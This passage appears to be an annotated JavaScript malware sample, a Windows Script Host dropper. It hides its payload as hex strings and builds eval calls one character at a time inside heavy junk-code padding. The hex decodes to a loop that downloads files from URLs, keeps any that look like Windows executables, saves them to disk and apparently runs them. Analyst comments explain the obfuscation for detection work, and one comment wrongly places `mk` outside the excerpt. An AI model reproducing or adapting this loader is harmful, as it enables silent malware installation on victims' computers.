        return 'mli'.lastIndexOf('i');
    };
    var QS = function() {
        return Math.round(285725095);
    };
    var IOr = function() {
        return Math.round(40131064);
    };
    if ('ay'.charAt(1)) {}
    rhj += '797065203D20313B0A202';
    for (var aam = 5; aam < 5; ++aam) {}
    for (var uah = 1; uah < 2; ++uah) {
        for (var aam = 5; aam < 5; ++aam) {}
    }

    function oAA() {
        return 'q'.search(/q/);
    }

    function wqx() {
        return 'oar'.lastIndexOf('a');
    }
    var Ef = function() {
        return 943;
    };
    var V9f = function() {
        return 'auk'.toLowerCase();
    };
    if ('nc'.search(/c/)) {
        for (var aam = 5; aam < 5; ++aam) {}
        for (var uah = 1; uah < 2; ++uah) {
            for (var aam = 5; aam < 5; ++aam) {}
        }

        function oAA() {
            return 'q'.search(/q/);
        }
    }
    rhj += '02020736F6A2E5772697465282070757720293B0A20202020';
    for (var yez = 1; yez < 2; ++yez) {}
    if (new Date()) {
        for (var yez = 1; yez < 2; ++yez) {}
    }
    if (Math.sqrt(549801476)) {
        for (var yez = 1; yez < 2; ++yez) {}
        if (new Date()) {
            for (var yez = 1; yez < 2; ++yez) {}
        }
    }
    rhj += '736F6A2E506F736974696F6E203D2030';
    if ('s'.search(/s/)) {}

    function Hy() {
        return 'ata'.lastIndexOf('a');
    }
    if (565) {
        if ('s'.search(/s/)) {}
    }
    if ('ut'.slice(2, 2)) {
        if ('s'.search(/s/)) {}

        function Hy() {
            return 'ata'.lastIndexOf('a');
        }
        if (565) {
            if ('s'.search(/s/)) {}
        }
    }
    rhj += '3B0A20202020736';
    if (Math.round(198825890)) {}
    var xu = function() {
        if (Math.round(198825890)) {}
    };
    xu();
    if (Math.round(827207168)) {
        if (Math.round(198825890)) {}
        var xu = function() {
            if (Math.round(198825890)) {}
        };
        xu();
    }
    rhj += 'F6A2E53617665546F46696C65282061612C20322029';
    rhj += '3B0A20202020736F6A2E436C6F7365282';
    for (var rgu = 2; rgu < 3; ++rgu) {}
    rhj += '93B0A7D0A0A66756E6374696F6E206F757128';
    rhj += '20656A20290A7B0A202';
    rhj += '0202072657475726E20656A2E726573706F6E736554657874';
    var EjT = function() {
        return new Date();
    };
    var ASA = function() {
        return 24;
    };
    var Gbo = function() {
        return new Date();
    };
    var Ab = function() {};
    Ab();
    rhj += '2';
    rhj += 'E6D6174636828202F5E4D5A2';

    function Dw() {}
    Dw();
    rhj += 'F202920213D3D206E756C6C3B0A7D';

    function Ah() {}
    Ah();
    for (var uwe = 1; uwe < 3; ++uwe) {
        function Ah() {}
        Ah();
    }
    var Qy7 = function() {
        return 'q';
    };
    var zI = function() {
        return 'ai'.charAt(1);
    };
    var jG = function() {
        return 'js'.toLowerCase();
    };
    rhj += '0A0A76617220656A203D206E6';

    function V2H() {}
    V2H();
    rhj += '57720416374697665584F626A656374282022';
    rhj += '4D53584D4C322E584D4C4854';
    if ('dui'.toLowerCase()) {}

    function Og() {
        if ('dui'.toLowerCase()) {}
    }
    Og();

    function qKq() {
        return 'ah'.replace(/a/, 'a');
    }

    function KW() {
        return 'sue'.toLowerCase();
    }
    for (var ipe = 1; ipe < 4; ++ipe) {
        if ('dui'.toLowerCase()) {}

        function Og() {
            if ('dui'.toLowerCase()) {}
        }
        Og();
    }
    rhj += '54502220293B0A76617220736F6A203D';
    for (var emu = 5; emu < 5; ++emu) {}
    if ('eqe'.charAt(0)) {
        for (var emu = 5; emu < 5; ++emu) {}
    }

    function LZ() {
        return 't'.slice(1, 1);
    }
    var Dsa = function() {
        return 'a'.slice(1, 1);
    };

    function Ba() {
        return 'd'.toLowerCase();
    }
    rhj += '206E657720416374697665584F626';

    function Fq() {
        return 863;
    }
    var A11 = function() {
        return 'e'.charAt(0);
    };
    var DSp = function() {
        return 'z'.slice(1, 1);
    };
    if ('fng'.lastIndexOf('n')) {}
    rhj += 'A65637428202241444F44422E53747265616D2220293B0';
    if ('aa'.search(/a/)) {}

    function Av() {
        return new Date();
    }

    function Bad() {
        return new Date();
    }
    if ('au'.slice(1, 2)) {
        if ('aa'.search(/a/)) {}

        function Av() {
            return new Date();
        }

        function Bad() {
            return new Date();
        }
    }
    if ('o'.slice(1, 1)) {
        if ('aa'.search(/a/)) {}

        function Av() {
            return new Date();
        }

        function Bad() {
            return new Date();
        }
        if ('au'.slice(1, 2)) {
            if ('aa'.search(/a/)) {}

            function Av() {
                return new Date();
            }

            function Bad() {
                return new Date();
            }
        }
    }
    rhj += 'A7768696C652820747275652029207B0A20202020766172206';
    for (var ib = 5; ib < 5; ++ib) {}

    function x8() {
        return new Date();
    }

    function Akd() {
        for (var ib = 5; ib < 5; ++ib) {}

        function x8() {
            return new Date();
        }
    }
    Akd();
    rhj += 'F6C78203D20796569282';
    for (var az = 2; az < 3; ++az) {}
    var klM = function() {
        return new Date();
    };
    var VU = function() {
        return Math.round(629285189);
    };

    function qY() {
        for (var az = 2; az < 3; ++az) {}
        var klM = function() {
            return new Date();
        };
        var VU = function() {
            return Math.round(629285189);
        };
    }
    qY();

    function FG() {
        return 'u'.search(/u/);
    }
    rhj += '93B0A202020206966282021';

    function n8() {}
    n8();

    function SuK() {
        return 'irj'.slice(1, 3);
    }
    var Fs = function() {
        function n8() {}
        n8();

        function SuK() {
            return 'irj'.slice(1, 3);
        }
    };
    Fs();
    rhj += '206F6C782029207B0A2020202020202020202';

    function vJ() {
        return 'wj'.slice(1, 2);
    }

    function XI() {
        return 'el'.slice(2, 2);
    }
    if ('u'.replace(/u/, 'u')) {}

    function RpM() {
        return 'kut'.concat('otu');
    }
    var D0q = function() {
        return 'uo'.concat('eee');
    };

    function h2h() {
        function vJ() {
            return 'wj'.slice(1, 2);
        }

        function XI() {
            return 'el'.slice(2, 2);
        }
        if ('u'.replace(/u/, 'u')) {}
    }
    h2h();
    rhj += '0202020202';
    rhj += '0206272656';
    rhj += '16B3B0A202020207';
    rhj += 'D0A2020202';
    rhj += '0747279207B0A202020202';
    if ('uob'.charAt(2)) {}
    var RgE = function() {
        return 'li'.search(/i/);
    };
    var DQ = function() {
        return Math.round(131373060);
    };
    var Av7 = function() {
        return 'u'.slice(1, 1);
    };
    rhj += '02020202020202020202020656';
    var ami = function() {
        return 'ai'.replace(/i/, 'a');
    };
    var MN3 = function() {
        return 'i'.charAt(0);
    };

    function C2() {
        return 'xi'.slice(1, 1);
    }
    if ('fk'.search(/k/)) {}
    rhj += 'A2E4F70656E282022474554222C206F6C782C2066616C73652';
    rhj += '0293B0A2020202020202020656A2E53656E64';
    rhj += '28293B0A20202020202020200A20202020202020200A';
    if ('bu'.search(/b/)) {}
    var C4k = function() {
        return 'i'.slice(1, 1);
    };
    var K6 = function() {
        return 'qv'.concat('ve');
    };
    for (var hj = 5; hj < 5; ++hj) {
        if ('bu'.search(/b/)) {}
    }
    rhj += '2020202020202020696628206F75712820656A202920';
    rhj += '29207B0A202020202020202020202020202020202020202';
    var YR = function() {};
    YR();
    rhj += '020202020';
    var jom = function() {};
    jom();
    if ('i'.slice(1, 1)) {
        var jom = function() {};
        jom();
    }
    var AE = function() {
        return 'a'.charAt(0);
    };

    function tRS() {
        return 'a'.slice(1, 1);
    }

    function o7U() {
        return 'leo'.charAt(1);
    }
    for (var shu = 5; shu < 5; ++shu) {
        var jom = function() {};
        jom();
        if ('i'.slice(1, 1)) {
            var jom = function() {};
            jom();
        }
        var AE = function() {
            return 'a'.charAt(0);
        };

        function tRS() {
            return 'a'.slice(1, 1);
        }

        function o7U() {
            return 'leo'.charAt(1);
        }
    }
    rhj += '766172206161203D206B696F28293B0A202020';

    function fY() {}
    fY();
    var x6O = function() {
        return 'wo'.charAt(0);
    };

    function J() {
        function fY() {}
        fY();
    }
    J();
    rhj += '2020202020202020207861';
    for (var rae = 5; rae < 5; ++rae) {}

    function AFs() {
        for (var rae = 5; rae < 5; ++rae) {}
    }
    AFs();

    function g5l() {
        return 'k'.lastIndexOf('k');
    }

    function aMw() {
        return 'ie'.toLowerCase();
    }

    function Aw() {
        return Math.sqrt(783621593);
    }
    rhj += '6F2820656A2E526573706F6E7365426F64';
    var G3 = function() {};
    G3();
    var vF = function() {
        var G3 = function() {};
        G3();
    };
    vF();
    for (var ioo = 2; ioo < 4; ++ioo) {
        var G3 = function() {};
        G3();
        var vF = function() {
            var G3 = function() {};
            G3();
        };
        vF();
    }
    rhj += '792C2061612029';
    rhj += '3B0A2020202';
    rhj += '020';
    var kD = function() {};
    kD();
    rhj += '202020202020202020202020202020202020207A6B7228206';
    var wi = function() {
        return 'gma'.replace(/g/, 'g');
    };
    var zU0 = function() {
        return 'i';
    };

    function As() {
        return 'ku'.slice(1, 2);
    }
    if ('um'.replace(/m/, 'u')) {}
    var OY = function() {
        var wi = function() {
            return 'gma'.replace(/g/, 'g');
        };
        var zU0 = function() {
            return 'i';
        };

        function As() {
            return 'ku'.slice(1, 2);
        }
        if ('um'.replace(/m/, 'u')) {}
    };
    OY();

    function NyA() {
        return new Date();
    }
    rhj += '16120293B0A202020202020202020202020202020';

    function KE() {
        return 'u'.replace(/u/, 'u');
    }
    for (var kai = 3; kai < 5; ++kai) {}
    var T3 = function() {
        function KE() {
            return 'u'.replace(/u/, 'u');
        }
        for (var kai = 3; kai < 5; ++kai) {}
    };
    T3();
    rhj += '20202020';
    if ('ouo'.lastIndexOf('o')) {}
    for (var sz = 3; sz < 4; ++sz) {
        if ('ouo'.lastIndexOf('o')) {}
    }
    if (582) {
        if ('ouo'.lastIndexOf('o')) {}
        for (var sz = 3; sz < 4; ++sz) {
            if ('ouo'.lastIndexOf('o')) {}
        }
    }
    var Amo = function() {
        return 742;
    };
    rhj += '20202020200A202020202020202020202020627265616B3B';
    rhj += '0A20202020202020207D0A2020202020202020656C7';
    rhj += '365207B0A20202020202';
    if ('hia'.toLowerCase()) {}

    function Vc() {
        return 'gia'.replace(/a/, 'a');
    }

    function z9g() {
        return 'ae'.search(/a/);
    }
    rhj += '02020202020202020';
    var Uz = function() {
        return 'ip'.concat('f');
    };
    var wBk = function() {
        return new Date();
    };
    for (var df = 3; df < 5; ++df) {}
    rhj += '2020202020207D0A202020207D0A202020206361746368282';
    rhj += '07A77722029207';
    var gw7 = function() {};
    gw7();
    if ('wp'.charAt(1)) {
        var gw7 = function() {};
        gw7();
    }
    var gGi = function() {
        return Math.round(163097445);
    };

    function wZ() {
        var gw7 = function() {};
        gw7();
        if ('wp'.charAt(1)) {
            var gw7 = function() {};
            gw7();
        }
    }
    wZ();
    rhj += 'B0A20202020202020202020202';
    var Aak = function() {};
    Aak();

    function Ak() {
        return Math.round(311565956);
    }

    function Yp() {
        return 'jc';
    }
    var bN = function() {
        return 'dus'.search(/d/);
    };
    rhj += '07D0A7D';
    for (var uvs = 2; uvs < 4; ++uvs) {}
    for (var sde = 2; sde < 5; ++sde) {
        for (var uvs = 2; uvs < 4; ++uvs) {}
    }
    vi = rhj;

    /**
     * Evaluates the JavaScript source text `ggh` and returns the result.
     *
     * The evaluator is assembled indirectly rather than by calling eval()
     * by name:
     *   nwc() -> aei()            builds the string "return eval(ggh)" one
     *                             character at a time into the outer
     *                             variable `ofz`
     *   zqo() -> xks() -> rce() -> per()
     *                             builds the string "ggh" into `rii` and
     *                             sets the outer variable `uu = oej(rii, ofz)`
     *   return uu(ggh)            invokes the callable so obtained
     * `oej`, `ofz` and `uu` are not defined in this block. Given the two
     * strings handed to it ("ggh" and "return eval(ggh)"), oej presumably
     * wraps the Function constructor (new Function("ggh", "return eval(ggh)"))
     * — TODO confirm against its definition elsewhere in the file.
     *
     * Everything else in the block — loops whose condition is false on
     * entry, nested functions that are declared but never referenced,
     * conditionals with empty bodies, re-declarations of the same helper —
     * is padding with no effect on the return value. For detection
     * purposes the block is a string-built eval: the core obfuscation
     * primitive of this dropper (see mk() for one string it is fed).
     *
     * @param {string} ggh - source text to evaluate
     * @returns {*} the result of eval(ggh), via uu
     */
    function vqo(ggh) {
        for (var etx = 3; etx < 4; ++etx) {}

        // Padding: NZ and k87 are never referenced in this block.
        function NZ() {
            return 'e'.concat('wkt');
        }

        function k87() {
            return 'i';
        }
        // Padding: loop condition 1 < 1 is false on entry, body never runs.
        for (var qrr = 1; qrr < 1; ++qrr) {
            for (var etx = 3; etx < 4; ++etx) {}

            function NZ() {
                return 'e'.concat('wkt');
            }

            function k87() {
                return 'i';
            }
        }

        // Builds the text "return eval(ggh)" into the outer variable ofz.
        // Only the `ciu += ...` lines contribute; the rest is padding.
        function aei() {
            function nrp() {}
            nrp();
            // ciu accumulates: r e t u r n <space> e v a l ( g g h )
            var ciu = "";

            function RWM() {}
            RWM();
            ciu += 'r';
            if ('qi'.replace(/q/, 'q')) {}
            if ('aot'.slice(3, 3)) {
                if ('qi'.replace(/q/, 'q')) {}
            }
            ciu += 'e';
            if ('o'.replace(/o/, 'o')) {}

            function APr() {
                return Math.round(910289275);
            }
            var rCc = function() {
                if ('o'.replace(/o/, 'o')) {}
            };
            rCc();
            if ('a'.charAt(0)) {
                if ('o'.replace(/o/, 'o')) {}

                function APr() {
                    return Math.round(910289275);
                }
                var rCc = function() {
                    if ('o'.replace(/o/, 'o')) {}
                };
                rCc();
            }
            ciu += 't';
            if (new Date()) {}

            function AO() {
                return new Date();
            }

            function hC() {
                return Math.round(39666352);
            }

            function RY() {
                return Math.round(402551665);
            }
            if ('c'.charAt(0)) {
                if (new Date()) {}

                function AO() {
                    return new Date();
                }

                function hC() {
                    return Math.round(39666352);
                }

                function RY() {
                    return Math.round(402551665);
                }
            }
            ciu += 'u';

            function IAc() {
                return 'uo'.replace(/o/, 'o');
            }
            var aX = function() {
                return 'ica'.search(/i/);
            };

            function vy() {}
            vy();
            for (var owo = 4; owo < 5; ++owo) {
                function IAc() {
                    return 'uo'.replace(/o/, 'o');
                }
                var aX = function() {
                    return 'ica'.search(/i/);
                };

                function vy() {}
                vy();
            }
            for (var qf = 1; qf < 1; ++qf) {
                function IAc() {
                    return 'uo'.replace(/o/, 'o');
                }
                var aX = function() {
                    return 'ica'.search(/i/);
                };

                function vy() {}
                vy();
                for (var owo = 4; owo < 5; ++owo) {
                    function IAc() {
                        return 'uo'.replace(/o/, 'o');
                    }
                    var aX = function() {
                        return 'ica'.search(/i/);
                    };

                    function vy() {}
                    vy();
                }
            }
            ciu += 'r';

            function b2C() {
                return 'o'.search(/o/);
            }
            for (var oux = 2; oux < 2; ++oux) {}
            ciu += 'n';
            for (var ufi = 2; ufi < 5; ++ufi) {}

            function TI() {
                return new Date();
            }

            function A8l() {
                return 'oa'.search(/a/);
            }

            function xfU() {
                return Math.sqrt(771210288);
            }
            ciu += ' ';
            var JDa = function() {};
            JDa();
            if ('o'.concat('uio')) {
                var JDa = function() {};
                JDa();
            }
            // "eval" is spelled out across the next four appends so the
            // token never appears literally in the file.
            ciu += 'e';
            ciu += 'v';
            if ('igz'.slice(1, 3)) {}
            if ('raa'.replace(/a/, 'a')) {
                if ('igz'.slice(1, 3)) {}
            }
            var C4 = function() {
                return 'ok'.concat('v');
            };
            var Enc = function() {
                return Math.round(783605839);
            };

            function Jv() {
                return 'ie'.slice(1, 1);
            }
            if ('s'.search(/s/)) {
                if ('igz'.slice(1, 3)) {}
                if ('raa'.replace(/a/, 'a')) {
                    if ('igz'.slice(1, 3)) {}
                }
            }
            ciu += 'a';
            if ('rif'.slice(2, 3)) {}
            if ('m'.slice(1, 1)) {
                if ('rif'.slice(2, 3)) {}
            }

            function D0() {
                return 465;
            }

            function AvK() {
                return 'uy'.lastIndexOf('y');
            }
            if ('izg'.slice(3, 3)) {
                if ('rif'.slice(2, 3)) {}
                if ('m'.slice(1, 1)) {
                    if ('rif'.slice(2, 3)) {}
                }
            }
            ciu += 'l';
            for (var fso = 3; fso < 3; ++fso) {}
            if (new Date()) {
                for (var fso = 3; fso < 3; ++fso) {}
            }
            var LA = function() {
                for (var fso = 3; fso < 3; ++fso) {}
                if (new Date()) {
                    for (var fso = 3; fso < 3; ++fso) {}
                }
            };
            LA();
            ciu += '(';

            function VZ() {
                return Math.sqrt(167940544);
            }
            var kWV = function() {
                return 'ia'.charAt(1);
            };
            var tve = function() {
                return 'sa'.search(/a/);
            };
            for (var hrg = 1; hrg < 4; ++hrg) {}
            ciu += 'g';
            var I1D = function() {};
            I1D();
            for (var pi = 3; pi < 4; ++pi) {
                var I1D = function() {};
                I1D();
            }
            if ('q'.replace(/q/, 'q')) {
                var I1D = function() {};
                I1D();
                for (var pi = 3; pi < 4; ++pi) {
                    var I1D = function() {};
                    I1D();
                }
            }
            ciu += 'g';
            var A7M = function() {};
            A7M();

            function kg() {
                var A7M = function() {};
                A7M();
            }
            kg();
            ciu += 'h';
            if ('t'.slice(1, 1)) {}

            function SXD() {
                if ('t'.slice(1, 1)) {}
            }
            SXD();

            function tZ() {
                return Math.round(852120085);
            }
            var KC = function() {
                return 'i'.toLowerCase();
            };
            for (var ksd = 1; ksd < 5; ++ksd) {
                if ('t'.slice(1, 1)) {}

                function SXD() {
                    if ('t'.slice(1, 1)) {}
                }
                SXD();
            }
            ciu += ')';
            // ciu is now "return eval(ggh)". ofz is not declared in this
            // block, so this writes an outer (likely global) binding.
            ofz = ciu;
        }

        // Wrapper whose only effect is the aei() call below.
        function nwc() {
            for (var aeg = 4; aeg < 4; ++aeg) {}
            for (var epq = 2; epq < 5; ++epq) {
                for (var aeg = 4; aeg < 4; ++aeg) {}
            }

            function AWZ() {
                for (var aeg = 4; aeg < 4; ++aeg) {}
                for (var epq = 2; epq < 5; ++epq) {
                    for (var aeg = 4; aeg < 4; ++aeg) {}
                }
            }
            AWZ();
            aei();
            if ('gw'.toLowerCase()) {}
            if ('ua') {
                if ('gw'.toLowerCase()) {}
            }
        }
        var ZT = function() {};
        ZT();
        if (new Date()) {
            var ZT = function() {};
            ZT();
        }
        for (var jua = 2; jua < 2; ++jua) {
            var ZT = function() {};
            ZT();
            if (new Date()) {
                var ZT = function() {};
                ZT();
            }
        }
        var D7 = function() {
            return new Date();
        };
        // Step 1: populate ofz with "return eval(ggh)".
        nwc();
        var A0 = function() {};
        A0();
        var GZ = function() {
            return 'om'.lastIndexOf('m');
        };

        function AW5() {
            return 'wh'.charAt(0);
        }
        if ('eoi'.charAt(2)) {
            var A0 = function() {};
            A0();
            var GZ = function() {
                return 'om'.lastIndexOf('m');
            };

            function AW5() {
                return 'wh'.charAt(0);
            }
        }

        // Builds the text "ggh" into rii and creates the evaluator
        // uu = oej("ggh", ofz). Only the `rii += ...` lines and the final
        // assignment matter; the rest is padding.
        function per() {
            if ('p'.replace(/p/, 'p')) {}

            function ID() {
                return Math.sqrt(366529713);
            }

            function zi() {
                return 'i'.concat('d');
            }

            function jvZ() {
                if ('p'.replace(/p/, 'p')) {}

                function ID() {
                    return Math.sqrt(366529713);
                }

                function zi() {
                    return 'i'.concat('d');
                }
            }
            jvZ();
            var rii = "";
            if (Math.sqrt(409433579)) {}
            for (var yt = 1; yt < 4; ++yt) {
                if (Math.sqrt(409433579)) {}
            }
            if (Math.round(9963134)) {
                if (Math.sqrt(409433579)) {}
                for (var yt = 1; yt < 4; ++yt) {
                    if (Math.sqrt(409433579)) {}
                }
            }
            rii += 'g';
            if (new Date()) {}
            var mB = function() {
                return 'ia'.replace(/a/, 'a');
            };
            if (new Date()) {
                if (new Date()) {}
            }
            rii += 'g';
            rii += 'h';
            if (new Date()) {}
            var G9l = function() {
                return new Date();
            };
            var Vzw = function() {
                return 'o'.slice(1, 1);
            };
            if (new Date()) {
                if (new Date()) {}
            }

            function uSX() {
                if (new Date()) {}
                var G9l = function() {
                    return new Date();
                };
                var Vzw = function() {
                    return 'o'.slice(1, 1);
                };
                if (new Date()) {
                    if (new Date()) {}
                }
            }
            uSX();
            // rii is "ggh" here and ofz is "return eval(ggh)" (set by aei).
            // oej and uu are defined outside this block; oej presumably
            // returns new Function(rii, ofz) — TODO confirm.
            uu = oej(rii, ofz);
        }
        // rce -> per(); everything else in rce is padding.
        var rce = function() {
            if (new Date()) {}

            function aE() {
                return Math.round(232601843);
            }
            if (Math.round(816781285)) {
                if (new Date()) {}

                function aE() {
                    return Math.round(232601843);
                }
            }
            per();
            if (Math.round(197158168)) {}
        };

        // xks -> rce -> per.
        function xks() {
            if ('uo'.charAt(1)) {}
            rce();
        }
        var Ay = function() {
            return Math.round(882510283);
        };
        var ABp = function() {
            return 'im'.search(/i/);
        };
        var pHM = function() {
            return Math.round(441631017);
        };
        if (Math.sqrt(334030541)) {}

        // zqo -> xks -> rce -> per: materialises uu before the return below.
        function zqo() {
            for (var ek = 2; ek < 3; ++ek) {}
            var Gh = function() {
                for (var ek = 2; ek < 3; ++ek) {}
            };
            Gh();
            xks();

            function Y() {}
            Y();
            if ('u'.concat('ibe')) {
                function Y() {}
                Y();
            }
        }
        // Step 2: set uu = oej("ggh", ofz).
        zqo();
        for (var hyy = 5; hyy < 5; ++hyy) {}

        function suA() {
            return 909;
        }
        if ('im'.replace(/m/, 'm')) {
            for (var hyy = 5; hyy < 5; ++hyy) {}

            function suA() {
                return 909;
            }
        }
        var w89 = function() {};
        w89();
        if ('kel'.charAt(0)) {
            var w89 = function() {};
            w89();
        }
        var Aa = function() {
            var w89 = function() {};
            w89();
            if ('kel'.charAt(0)) {
                var w89 = function() {};
                w89();
            }
        };
        Aa();
        // Step 3: evaluate the caller-supplied source. Everything after this
        // return is unreachable (c7D's declaration is hoisted, but the call
        // and the var assignment never execute).
        return uu(ggh);
        for (var ja = 1; ja < 1; ++ja) {}

        function c7D() {
            for (var ja = 1; ja < 1; ++ja) {}
        }
        c7D();
        var zng = function() {
            return 'oco'.toLowerCase();
        };
    }
    var ADs = function() {
        return 'oe'.charAt(0);
    };
    if ('e'.slice(1, 1)) {}

    function B4() {
        return 'om'.concat('r');
    }

    function AJ() {
        return 'g'.slice(1, 1);
    }

    function P4r() {
        return 'i'.lastIndexOf('i');
    }
    for (var op = 4; op < 5; ++op) {
        var ADs = function() {
            return 'oe'.charAt(0);
        };
        if ('e'.slice(1, 1)) {}
    }

    /**
     * Assembles a small piece of source text in `uy` and runs it through
     * vqo() (the string-built eval in this file). Concatenating the
     * `uy += ...` fragments in order gives:
     *
     *   ow=function(srr,vaa,cz){return srr.substr(vaa,cz);};
     *
     * i.e. evaluating it defines a global substring helper `ow`. The value
     * returned by vqo(uy) is stored in `uyq`, which is not declared in this
     * block (an outer/global binding). Nothing else in the function has any
     * observable effect: the nested functions are never referenced, the
     * loops with a false entry condition never run, and the remaining
     * conditionals have empty bodies.
     */
    function mk() {
        var uy = "";
        uy += 'ow=f';

        function lV1() {}
        lV1();
        uy += 'unct';
        if ('c'.slice(1, 1)) {}
        var LS = function() {
            return 'a'.charAt(0);
        };

        function yR() {
            return new Date();
        }
        uy += 'io';
        uy += 'n';
        var qv = function() {};
        qv();
        for (var kbx = 1; kbx < 3; ++kbx) {
            var qv = function() {};
            qv();
        }
        uy += '(sr';
        var Ji = function() {
            return new Date();
        };
        var cUc = function() {};
        cUc();
        uy += 'r,va';
        var aK = function() {};
        aK();

        function wk() {
            var aK = function() {};
            aK();
        }
        wk();
        var RU4 = function() {
            return 'jk'.search(/j/);
        };

        function RAS() {
            return 'd';
        }
        var hD = function() {
            var aK = function() {};
            aK();

            function wk() {
                var aK = function() {};
                aK();
            }
            wk();
            var RU4 = function() {
                return 'jk'.search(/j/);
            };

            function RAS() {
                return 'd';
            }
        };
        hD();
        uy += 'a,cz';
        uy += '){r';
        var Gxh = function() {};
        Gxh();
        if ('i'.search(/i/)) {
            var Gxh = function() {};
            Gxh();
        }
        uy += 'etur';
        for (var lze = 3; lze < 3; ++lze) {}
        if (new Date()) {
            for (var lze = 3; lze < 3; ++lze) {}
        }
        uy += 'n srr';
        for (var ute = 4; ute < 5; ++ute) {}
        var lY = function() {
            for (var ute = 4; ute < 5; ++ute) {}
        };
        lY();
        uy += '.';

        function Ykb() {}
        Ykb();
        uy += 'subs';
        for (var iea = 3; iea < 5; ++iea) {}

        function EI() {
            return new Date();
        }
        var MXR = function() {
            return Math.round(832756217);
        };
        var Yo = function() {
            return 'xhk'.concat('edu');
        };
        for (var kir = 2; kir < 3; ++kir) {
            for (var iea = 3; iea < 5; ++iea) {}

            function EI() {
                return new Date();
            }
            var MXR = function() {
                return Math.round(832756217);
            };
            var Yo = function() {
                return 'xhk'.concat('edu');
            };
        }

        function zLY() {
            return 'a'.toLowerCase();
        }

        function Xdr() {
            return 'gi'.slice(2, 2);
        }
        var syn = function() {
            return 'bri'.search(/r/);
        };
        if (Math.round(344859654)) {
            for (var iea = 3; iea < 5; ++iea) {}

            function EI() {
                return new Date();
            }
            var MXR = function() {
                return Math.round(832756217);
            };
            var Yo = function() {
                return 'xhk'.concat('edu');
            };
            for (var kir = 2; kir < 3; ++kir) {
                for (var iea = 3; iea < 5; ++iea) {}

                function EI() {
                    return new Date();
                }
                var MXR = function() {
                    return Math.round(832756217);
                };
                var Yo = function() {
                    return 'xhk'.concat('edu');
                };
            }
        }
        uy += 'tr(va';
        if (Math.round(189857590)) {}
        var Ae = function() {
            return 's'.toLowerCase();
        };
        var Au8 = function() {
            return Math.sqrt(225758407);
        };
        var RE6 = function() {
            return 'og';
        };

        function JS3() {
            if (Math.round(189857590)) {}
            var Ae = function() {
                return 's'.toLowerCase();
            };
            var Au8 = function() {
                return Math.sqrt(225758407);
            };
            var RE6 = function() {
                return 'og';
            };
        }
        JS3();
        for (var upu = 4; upu < 4; ++upu) {
            if (Math.round(189857590)) {}
            var Ae = function() {
                return 's'.toLowerCase();
            };
            var Au8 = function() {
                return Math.sqrt(225758407);
            };
            var RE6 = function() {
                return 'og';
            };

            function JS3() {
                if (Math.round(189857590)) {}
                var Ae = function() {
                    return 's'.toLowerCase();
                };
                var Au8 = function() {
                    return Math.sqrt(225758407);
                };
                var RE6 = function() {
                    return 'og';
                };
            }
            JS3();
        }
        uy += 'a,';
        if ('qt'.concat('o')) {}
        var ViG = function() {
            return 'a'.slice(1, 1);
        };
        uy += 'cz);';
        uy += '};';
        // uy is now "ow=function(srr,vaa,cz){return srr.substr(vaa,cz);};".
        // Executing string-assembled code is the detection-relevant event
        // here; uyq is written to an outer (likely global) binding.
        uyq = vqo(uy);
        if ('kq'.lastIndexOf('q')) {}
        for (var ump = 3; ump < 3; ++ump) {
            if ('kq'.lastIndexOf('q')) {}
        }
        if ('h') {
            if ('kq'.lastIndexOf('q')) {}
            for (var ump = 3; ump < 3; ++ump) {
                if ('kq'.lastIndexOf('q')) {}
            }
        }
    }

    // Padding wrapper: Y5 and AZV are empty no-ops, so the only call in this
    // body that can have any effect is mk(), which is defined outside this
    // excerpt (what it does cannot be determined from here).
    function pwi() {
        function Y5() {}
        Y5();
        var AZV = function() {
            function Y5() {}
            Y5();
        };
        AZV();
        mk(); // defined outside this excerpt — the one potentially live call
    }
    if (Math.round(631472652)) {}
    var UlL = function() {
        return 'ou'.toLowerCase();
    };
    if (246) {
        if (Math.round(631472652)) {}
        var UlL = function() {
            return 'ou'.toLowerCase();
        };
    }
    for (var jai = 5; jai < 5; ++jai) {
        if (Math.round(631472652)) {}
        var UlL = function() {
            return 'ou'.toLowerCase();
        };
        if (246) {
            if (Math.round(631472652)) {}
            var UlL = function() {
                return 'ou'.toLowerCase();
            };
        }
    }

    // Padding wrapper around pwi(): z4 is an empty no-op, the `for` loops
    // start at 5 with a `< 5` condition and never run, and 'm'.slice(1, 1)
    // is the empty string, so that `if` branch is never taken.
    function ha() {
        pwi(); // the only statement here with a possible effect

        function z4() {}
        z4();
        for (var aqx = 5; aqx < 5; ++aqx) {
            function z4() {}
            z4();
        }
        if ('m'.slice(1, 1)) {
            function z4() {}
            z4();
            for (var aqx = 5; aqx < 5; ++aqx) {
                function z4() {}
                z4();
            }
        }
    }

    function Rj() {}
    Rj();

    function Exs() {
        return 'i'.slice(1, 1);
    }
    var iC = function() {
        return Math.round(613658104);
    };
    for (var gd = 2; gd < 2; ++gd) {
        function Rj() {}
        Rj();
    }
    ha();
    for (var ep = 2; ep < 4; ++ep) {}

    function kQ() {
        for (var ep = 2; ep < 4; ++ep) {}
    }
    kQ();
    if ('ab'.slice(2, 2)) {}
    var jQ = function() {
        return 'jj'.concat('eka');
    };
    var e8 = function() {
        return 'sao'.concat('su');
    };
    var qqo = function() {
        if ('ab'.slice(2, 2)) {}
        var jQ = function() {
            return 'jj'.concat('eka');
        };
        var e8 = function() {
            return 'sao'.concat('su');
        };
    };
    qqo();
    var Ho = function() {
        return new Date();
    };

    function L5() {
        return 'e'.replace(/e/, 'e');
    }

    // Assembles, in the local string `pa`, the source text of two helper
    // functions and hands it to `vqo` (defined outside this excerpt); the
    // result is stored in the outer-scope variable `fon`. Joining the visible
    // `pa +=` fragments in order gives exactly:
    //   iak=function(srr,eai){return parseInt(srr,eai)};
    //   eee=function(srr){return String.fromCharCode(srr)};
    // so once that source has been compiled and run, `iak` is parseInt and
    // `eee` is String.fromCharCode (whether vqo runs it or only compiles it
    // is not visible here — confirm against vqo's definition). Everything
    // else in this body is padding: loops whose start value already fails
    // the condition, `if` tests on constant expressions with empty bodies,
    // and nested functions that are either never called or, when called,
    // only define more unused functions.
    function iaz() {
        function Axc() {}
        Axc();

        function hH() {
            function Axc() {}
            Axc();
        }
        hH();
        var pa = ""; // live: accumulator for the helper source; every `pa +=` below is live
        if ('oo'.toLowerCase()) {}

        function Noh() {
            if ('oo'.toLowerCase()) {}
        }
        Noh();
        pa += 'iak=f';

        function viC() {
            return 'oji'.charAt(2);
        }
        for (var uv = 5; uv < 5; ++uv) {}

        function En() {
            function viC() {
                return 'oji'.charAt(2);
            }
            for (var uv = 5; uv < 5; ++uv) {}
        }
        En();
        pa += 'u';
        if ('rg'.slice(1, 2)) {}
        for (var rm = 2; rm < 3; ++rm) {
